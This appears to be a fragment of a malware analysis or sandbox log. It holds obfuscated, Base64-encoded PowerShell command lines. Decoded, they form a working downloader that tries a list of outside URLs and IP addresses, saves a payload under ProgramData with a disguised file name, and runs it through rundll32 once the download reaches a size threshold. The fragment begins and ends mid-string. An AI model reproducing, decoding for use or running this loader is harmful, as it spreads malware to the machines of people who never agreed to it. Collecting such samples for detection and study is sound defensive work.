QQBBAD0APQBXAGEAegBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcARQBBAGIAZwBCAGgAQQBIAFEAQQBiAHcAQgB5AEEARwBrAEEAYwBnAEIAcABBAEgAVQBBAGIAUQBCAHoAQQBGAE0AQQBkAEEAQgB5AEEARwBFAEEAWQB3AEIAagBBAEcAZwBBAGEAUQBCAHUAQQBHADgAQQBMAGcAQgAyAEEARwBrAEEAYgBBAEIAcwBBAEcARQBBAGMAdwBBAD0AVwBhAHoAUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQAwAEEARABnAEEAIgA7ACQAUABlAGMAaABlAGQATABhAGQAeQBoAG8AbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAFkAdwBCAHAAQQBIAEEAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQBDAHIARgBsAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEcAawBBAFkAUQBCAHQAQQBHAEkAQQBaAFEAQgAxAEEASABnAEEATABnAEIAcQBBAEgAQQBBACIAOwAkAHUAbgBzAGUAZQBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBFAEEAYwBnAEIAbABBAEcARQBBAGIAQQBCAHMAQQBGAFUAQQBiAGcAQgB3AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAFoAQQBBAHUAQQBHAFEAQQBaAFEAQgB1AEEASABRAEEAWQBRAEIAcwBBAEEAPQA9AGUAQQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEANQBBAEMANABBAE0AZwBBADEAQQBEAFEAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAD0AZQBBAD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBjAFEAQgAxAEEARwBFAEEAYwBnAEIAcABBAEgATQBBAGQAQQBCAHoAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQAiADsAdAByAHkAIAB7ACQAQQBuAGkAcwBpAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAbwBBAEcAOABBAGIAZwBCAHYAQQBIAE0AQQBMAGcAQgB1AEEASABrAEEAWQB3AEEAPQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAZwBBAEwAZwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAdwBBAEMANABBAE0AUQBBADMAQQBEAFkAQQAiADsAJABSAGUAdAByAG8AbQBpAGcAcgBhAHQAaQBvAG4AUwBhAGwAdABpAHIAZQB3AGkAcwBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAdgBBAEcASQBBAGIAQQBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEAWgBBAEIATgBBAEcAOABBAGMAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQwA0AEEAYwB3AEIAbwBBAEcAOABBAGQAdwBBAD0AIgA7ACQARQBsAGUAYwB0AHIAbwBsAHkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBADQAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQA0AEEAQQA9AD0AIgA7ACQAbgBvAG4AbQBpAGwAaQB0AGEAbgB0AGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABMAGUAcAByAG8AdABpAGMARgBpAGQAZABsAGkAZQBzACkAKQA7AHcAZwBlAHQAIAAkAG4AbwBuAG0AaQBsAGkAdABhAG4AdABsAHkAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQA7ACQARABhAG0AYQBzAGsAaQBuAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATwBRAEEAeABBAEMANABBAE0AZwBBADAAQQBEAEUAQQBMAGcAQQA1AEEARABjAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAxADcAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARQBrAEEAWgBBAEIAbABBAEcAOABBAGMAQQBCAHkAQQBHAEUAQQBlAEEAQgBwAEEASABNAEEAZABBAEEAdQBBAEYASQBBAGQAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEASABRAEEAYQBRAEIAMgBBAEcAVQBBAEwAQQBCADIAQQBHAGsAQQBjAEEAQgB6AEEARABzAEEAYwB3AEIAcwBBAEcARQBBAFkAdwBCAHIAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEAIgA7ACQAcwB1AG0AbQBpAG4AZwBzAFAAbwBsAGwAZQByAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEgAUQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBFAEEAUQB3AEIAaABBAEgASQBBAFoAQQBCADEAQQBHAFUAQQBiAEEAQgBwAEEASABNAEEATABnAEIAMwBBAEcAOABBAGMAZwBCAHIAQQBBAD0APQBKAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYQBRAEIAcgBBAEcAawBBAGIAQQBCAHYAQQBHAEkAQQBiAEEAQgBoAEEASABNAEEAZABBAEEAdQBBAEcATQBBAGIAdwBCADEAQQBIAEkAQQBjAHcAQgBsAEEASABNAEEAIgA7ACQAdABvAGcAbABlAHMAcwBDAG8AcgBuAGMAcgBhAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAGgAQQBIAEEAQQBhAEEAQgA1AEEARwB3AEEAYQBRAEIAdQBBAEcAVQBBAFYAQQBCAG8AQQBHAGsAQQBiAFEAQgBpAEEARwB3AEEAWgBRAEIAdABBAEcARQBBAGIAZwBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7ACQAZwBsAHUAZQBtAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADAAQQBIAEkAQQBZAFEAQgB1AEEASABNAEEAWQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBTAGcAQgBoAEEASABJAEEAWgB3AEIAdgBBAEcAOABBAGIAZwBCAHoAQQBDADQAQQBZAHcAQgB2AEEARwA0AEEAZABBAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHADgAQQBjAGcAQgB6AEEAQQA9AD0AZAB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AdwBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABTAHUAcgBhAGQAZABpAHQAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBHAGcAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAcABBAEgATQBBAGQAQQBCAEoAQQBIAE0AQQBiAHcAQgB0AEEARwBVAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBCAHkAQQBIAEEAQQBhAEEAQgBwAEEASABNAEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBkAFEAQgB1AEEARwBrAEEAZABBAEIANQBBAEEAPQA9AFcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAdwBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB4AEEARABRAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADIAQQBBAD0APQBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABZAEEATgBnAEEAdQBBAEQAZwBBAE8AUQBBAD0AVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAYwB3AEIAcABBAEcARQBBAEwAZwBCADEAQQBIAE0AQQAiADsAJABpAGIAdQBwAHIAbwBmAGUAbgBEAGUAcgBlAGcAdQBsAGEAdABpAG8AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAZABRAEIAaQBBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAagBBAEcARQBBAFoAZwBCAGwAQQBBAD0APQBGAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAdwBCAHMAQQBIAGsAQQBjAEEAQgBvAEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGIAUQBCAEMAQQBHAHcAQQBaAFEAQgB3AEEARwBnAEEAWQBRAEIAeQBBAEcAOABBAGMAQQBCAG8AQQBIAFEAQQBhAEEAQgBoAEEARwB3AEEAYgBRAEIAcABBAEcARQBBAEwAZwBCAG8AQQBHADgAQQBjAGcAQgB6AEEARwBVAEEARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBrAEEAZABBAEIAMQBBAEgAUQBBAFoAUQBCAHkAQQBIAE0AQQBVAHcAQgB0AEEARwA4AEEAYQB3AEIAbABBAEgATQBBAEwAZwBCAGkAQQBHAEUAQQBiAGcAQgBrAEEAQQA9AD0AIgA7AH0AfQAkAFYAaQB0AHQAbABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEUAQQBOAHcAQQB1AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AdwBBAHgAQQBBAD0APQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAWgBRAEIAegBBAEcAMABBAFoAUQBCAHkAQQBHAGsAQQBjAHcAQgBsAEEAQwA0AEEAWgBnAEIAaABBAEcAawBBAGIAQQBBAD0AbwBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEUAQQBOAGcAQQA1AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AZwBBAHoAQQBEAEkAQQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATQBnAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQB4AEEARABZAEEATABnAEEAeABBAEQAYwBBAE8AQQBBAD0AIgA7ACQAbQBpAGMAcgBvAHAAaABhAGcAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AZwBBAHcAQQBDADQAQQBOAGcAQQB5AEEAQwA0AEEATQBRAEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQA9AHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAWQBRAEIAdABBAEcAawBBAGIAQQBCAHAAQQBHAEUAQQBjAGcAQgBwAEEASABRAEEAZQBRAEEAdQBBAEcAUQBBAGIAdwBCADMAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAPQAiADsA" |
cmdline | powershell -encodedcommand "JABIAG8AbABpAHMAdABBAGMAeQBsAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATwBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABrAEEATABnAEEAeQBBAEQAQQBBAE8AUQBBAD0ARwBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAGcAQQAxAEEAQwA0AEEATQBRAEEANQBBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBNAHcAQQA9ACIAOwAkAG4AaQBiAG8AbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMwBBAEMANABBAE4AUQBBAHkAQQBDADQAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAFIARQBLAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQAzAEEARABnAEEATABnAEEAeABBAEQASQBBAE0AdwBBAD0AUgBFAEsAbABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgBwAEEASABJAEEAWQBRAEIAcABBAEYAQQBBAGMAZwBCAGwAQQBIAEEAQQBkAFEAQgB3AEEARwBFAEEAYgBBAEEAdQBBAEcANABBAGQAUQBBAD0AIgA7ACQAWQBhAGsAbwBuAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAGsAQQBjAHcAQgB6AEEASABVAEEAWQBRAEIAawBBAEcARQBBAFkAZwBCAHMAQQBIAGsAQQBMAGcAQgBwAEEARwA0AEEAYQB3AEEAPQB5AHQAZQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAHcAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AQQBBAHcAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEANQA7ACQAYQBzAGUAYwByAGUAdABvAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAFkAUQBCAHMAQQBHAHcAQQBiAHcAQgAzAEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHMAQQBHAGsAQQBkAEEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEgAQQBBAGIAdwBCAHoAQQBHAFUAQQBaAEEAQQA9ACIAOwAkAGQAbwBlAGwAaQBuAGcAQQByAGMAaABvAHYAZQByAHMAZQBlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBjAHcAQgB0AEEARwA4AEEAWQB3AEIAeQBBAEcARQBBAGQAQQBBAHUAQQBIAFkAQQBhAFEAQgBoAEEARwBvAEEAWgBRAEIAegBBAEEAPQA9ACIAOwAkAGgAaQBiAGkAcwBjAHUAcwBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAdwBBAEMANABBAE8AUQBBAHkAQQBDADQAQQBNAFEAQQA1AEEARABJAEEAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAEUAQQBhAFEAQgAyAEEARwBFAEEAYgBBAEIANQBBAEcARQBBAEwAZwBCAHAAQQBHADQAQQBhAHcAQQA9AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBCAEEASABNAEEAWgBRAEIAcwBBAEcAdwBBAFkAUQBCADAAQQBHAFUAQQBSAFEAQgB0AEEASABBAEEAYQBBAEIAbABBAEcAMABBAFoAUQBCAHkAQQBHAEUAQQBiAEEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFkAdwBCAHYAQQBIAFUAQQBiAGcAQgAwAEEASABJAEEAZQBRAEEAPQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA0AEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAGMAQQBOAHcAQQA9ACIAOwAkAGQAaQBvAHMAYwBvAHIAZQBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAMABBAEMANABBAE0AUQBBADUAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATQB3AEEAdgBBAEUAWQBBAGMAdwBBADQAQQBGAEEAQQBlAFEAQQB2AEEARwB3AEEAUgBRAEIARgBBAEUAVQBBAFIAZwBBADQAQQBBAD0APQBiAHoAVQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBOAHcAQQA1AEEAQwA4AEEAVQBBAEIAcwBBAEUAdwBBAE4AQQBCAHQAQQBGAFUAQQBMAHcAQgBuAEEARQBFAEEATQBBAEIAVQBBAEcAOABBAFMAQQBBAD0AYgB6AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAYwB3AEIANgBBAEUAZwBBAFUAdwBCAEkAQQBEAE0AQQBSAHcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQATABlAHAAcgBvAHQAaQBjAEYAaQBkAGQAbABpAGUAcwAgAGkAbgAgACQAZABpAG8AcwBjAG8AcgBlAGkAbgAgAC0AcwBwAGwAaQB0ACAAIgBiAHoAVQAiACkAIAB7ACQAQwBhAHMAcwBvAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEANQBBAEMANABBAE0AZwBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBBAEEAdQBBAEQARQBBAE8AUQBBADQAQQBBAD0APQBXAGEAegBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcARQBBAGIAZwBCAGgAQQBIAFEAQQBiAHcAQgB5AEEARwBrAEEAYwBnAEIAcABBAEgAVQBBAGIAUQBCAHoAQQBGAE0AQQBkAEEAQgB5AEEARwBFAEEAWQB3AEIAagBBAEcAZwBBAGEAUQBCAHUAQQBHADgAQQBMAGcAQgAyAEEARwBrAEEAYgBBAEIAcwBBAEcARQBBAGMAdwBBAD0AVwBhAHoAUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQAwAEEARABnAEEAIgA7ACQAUABlAGMAaABlAGQATABhAGQAeQBoAG8AbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAFkAdwBCAHAAQQBIAEEAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQBDAHIARgBsAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEcAawBBAFkAUQBCAHQAQQBHAEkAQQBaAFEAQgAxAEEASABnAEEATABnAEIAcQBBAEgAQQBBACIAOwAkAHUAbgBzAGUAZQBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBFAEEAYwBnAEIAbABBAEcARQBBAGIAQQBCAHMAQQBGAFUAQQBiAGcAQgB3AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAFoAQQBBAHUAQQBHAFEAQQBaAFEAQgB1AEEASABRAEEAWQBRAEIAcwBBAEEAPQA9AGUAQQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEANQBBAEMANABBAE0AZwBBADEAQQBEAFEAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAD0AZQBBAD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBjAFEAQgAxAEEARwBFAEEAYwBnAEIAcABBAEgATQBBAGQAQQBCAHoAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQAiADsAdAByAHkAIAB7ACQAQQBuAGkAcwBpAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAbwBBAEcAOABBAGIAZwBCAHYAQQBIAE0AQQBMAGcAQgB1AEEASABrAEEAWQB3AEEAPQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAZwBBAEwAZwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAdwBBAEMANABBAE0AUQBBADMAQQBEAFkAQQAiADsAJABSAGUAdAByAG8AbQBpAGcAcgBhAHQAaQBvAG4AUwBhAGwAdABpAHIAZQB3AGkAcwBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAdgBBAEcASQBBAGIAQQBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEAWgBBAEIATgBBAEcAOABBAGMAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQwA0AEEAYwB3AEIAbwBBAEcAOABBAGQAdwBBAD0AIgA7ACQARQBsAGUAYwB0AHIAbwBsAHkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBADQAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQA0AEEAQQA9AD0AIgA7ACQAbgBvAG4AbQBpAGwAaQB0AGEAbgB0AGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABMAGUAcAByAG8AdABpAGMARgBpAGQAZABsAGkAZQBzACkAKQA7AHcAZwBlAHQAIAAkAG4AbwBuAG0AaQBsAGkAdABhAG4AdABsAHkAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQA7ACQARABhAG0AYQBzAGsAaQBuAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATwBRAEEAeABBAEMANABBAE0AZwBBADAAQQBEAEUAQQBMAGcAQQA1AEEARABjAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAxADcAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARQBrAEEAWgBBAEIAbABBAEcAOABBAGMAQQBCAHkAQQBHAEUAQQBlAEEAQgBwAEEASABNAEEAZABBAEEAdQBBAEYASQBBAGQAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEASABRAEEAYQBRAEIAMgBBAEcAVQBBAEwAQQBCADIAQQBHAGsAQQBjAEEAQgB6AEEARABzAEEAYwB3AEIAcwBBAEcARQBBAFkAdwBCAHIAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEAIgA7ACQAcwB1AG0AbQBpAG4AZwBzAFAAbwBsAGwAZQByAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEgAUQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBFAEEAUQB3AEIAaABBAEgASQBBAFoAQQBCADEAQQBHAFUAQQBiAEEAQgBwAEEASABNAEEATABnAEIAMwBBAEcAOABBAGMAZwBCAHIAQQBBAD0APQBKAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYQBRAEIAcgBBAEcAawBBAGIAQQBCAHYAQQBHAEkAQQBiAEEAQgBoAEE